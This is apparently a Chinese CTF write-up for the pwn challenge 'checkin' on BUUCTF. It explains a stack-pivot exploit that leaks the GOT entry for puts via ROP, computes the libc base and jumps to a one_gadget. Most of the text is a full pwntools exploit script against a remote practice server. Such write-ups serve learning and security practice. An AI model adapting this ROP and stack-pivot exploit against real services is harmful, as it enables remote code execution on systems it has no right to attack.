checkin

挺有意思的一道栈迁移

s1是全局变量，这里写rop泄露got表地址

为了再一次执行程序，rop后面接的不是puts_plt

而是调用puts函数的地址，既能泄露got表地址，又能再执行一次程序。

buf只能溢出到rbp，但是有两次leave，一个是sub_4018C7函数里的

上一个函数结束后到sub_401876函数里的，刚好能执行两次leave。

不过这里(unsigned int)sub_401974(buf)属实不太懂，太抽象了，也不知道它具体是怎么检查的

两次的payload不太一样。

payload1

payload1+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)
p.sendafter('>',payload1)

payload2=b'admin\x00\x00\x00'+p64(0)*3+p64(bss)
p.sendafter('Pass',payload2)

payload2

payload1=b'admin\x00\x00\x00'*3+p64(one_gadget)

p.sendafter('>',payload1)
payload2=b'admin\x00\x00\x00'*4+p64(bss+0x10)
p.sendafter('Pass',payload2)

exp

from pwn import*
from LibcSearcher import *
p=remote("node5.buuoj.cn",25691)
#p=process("./login_pro")
context.log_level="debug"
libc=ELF('./libc.So.6')
bss=0x602400
pop_rdi=0x401ab3
puts_plt=0x4018b5
puts_got=0x602028
payload1=b'admin\x00\x00\x00'
payload1+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)
p.sendafter('>',payload1)

payload2=b'admin\x00\x00\x00'+p64(0)*3+p64(bss)
p.sendafter('Pass',payload2)
p.recvuntil('BaileGeBai\n')
puts_got=u64(p.recvuntil('\n',drop=True).ljust(8,b'\x00'))
print(hex(puts_got))
base=puts_got-libc.sym['puts']
one=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget=base+one[1]
#gdb.attach(p)
sleep(1)

payload1=b'admin\x00\x00\x00'*3+p64(one_gadget)

p.sendafter('>',payload1)
payload2=b'admin\x00\x00\x00'*4+p64(bss+0x10)
p.sendafter('Pass',payload2)

#p.sendline(payload)

p.interactive()